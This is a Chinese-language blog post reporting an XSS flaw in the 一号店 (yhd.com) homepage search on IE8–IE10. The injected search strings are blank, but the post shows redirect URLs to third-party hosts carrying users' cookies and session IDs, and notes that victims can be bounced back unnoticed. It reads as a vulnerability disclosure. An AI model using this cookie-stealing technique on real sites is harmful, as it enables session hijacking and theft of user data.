发现一号店首页曝出重大XSS漏洞,在IE8,IE9,IE10上均有此漏洞

  1. 云栖社区>
  2. 博客>
  3. 正文

发现一号店首页曝出重大XSS漏洞,在IE8,IE9,IE10上均有此漏洞

杨振平 2015-10-12 22:49:02 浏览987
展开阅读全文

发现一号店首页曝出XSS漏洞,在IE8,IE9,IE10上均有此漏洞

1.进入一号店首页:

http://www.yhd.com


2.搜索第一个字符串或者第二个字符串:

第一个: 

第二个:

(这里说明下,第一个字符和第二个字符都是单引号,第三个字符是双引号,接着!--)

搜索页面:



3.在IE8,IE9,IE10上按下搜索键

页面跳转到:

http://wz.cn/?p=test_cookie=1; abtest=68; guid=YY4T47H26NXG2JTP38FW93E9JX4TPRC565UV; wide_screen=1; provinceId=1; gla=1.-10_0_0; bfd_session_id=bfd_s=40580330.8501225.1444660093687; tmc=2.40580330.87011629.1444660093687.1444660093687.1444660713109; tma=40580330.58495271.1444560200046.1444560200046.1444610223234.2; tmd=22.40580330.58495271.1444560200046.; linkPosition=search; JSESSIONID=18373150176C65FE11EB46BA041B0729 

或者:

http://wz0.cn/?p=abtest=68; guid=YY4T47H26NXG2JTP38FW93E9JX4TPRC565UV; wide_screen=1; provinceId=1; gla=1.-10_0_0; bfd_session_id=bfd_s=40580330.8501225.1444660093687; tmc=3.40580330.87011629.1444660093687.1444660713109.1444661000125; tma=40580330.58495271.1444560200046.1444560200046.1444610223234.2; tmd=23.40580330.58495271.1444560200046.; linkPosition=search; JSESSIONID=B1DE4F8D449DC5B8C133259F19339223 



注:当页面跳转到第三方网站后,存储完用户信息后,可以再跳到一号店的首页,如果这个过程速度快,用户可能没有察觉到,当然360卫士是拦截了第一个,不过第二个好像没有拦截。

网友评论

登录后评论
0/500
评论
杨振平
+ 关注